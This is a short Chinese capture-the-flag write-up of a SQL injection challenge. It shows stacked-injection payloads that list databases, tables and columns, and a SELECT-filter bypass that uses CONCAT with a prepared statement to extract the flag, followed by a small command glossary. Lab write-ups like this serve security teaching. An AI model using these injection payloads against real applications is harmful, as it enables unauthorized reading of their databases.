BUU-Web-[强网杯 2019]随便注1
这是一道SQL注入题

先进行简单是注入操作,发现了敏感库名‘supersqli’【1';show databases;】

当然我们也可以查看其他库里的内容【1';show tables from supersqli;】

要素察觉!

然后我们尝试查看丑表【1';show columns from `1919810931114514`;】注意这里对丑表的表名需要添加反引号``

当我们尝试把flag用SELECT取出时发现SELECT被进行了过滤

这里可以尝试使用堆叠注入,进行预处理【1';SET @b=CONCAT('SEL','ECT flag FROM `1919810931114514`;');PREPARE a FROM @b;execute a;】



对使用的命令进行总结
show databases; 查看数据库
show tables from [databases_name] 查看该数据库中的表名
show columns from [table_name] 查看该表中的字段
SELSECT [value] from [columns_name] 查询该字段下的vulue这条数据的内容
SET @b = [XXX] 设置变量@b为xxxx
CONCAT(a,b) 将a,b内容进行拼接
PREPARE a from @b; 定义预处理语句将预处理语句说明为a
EXECUTE a; 执行预处理语句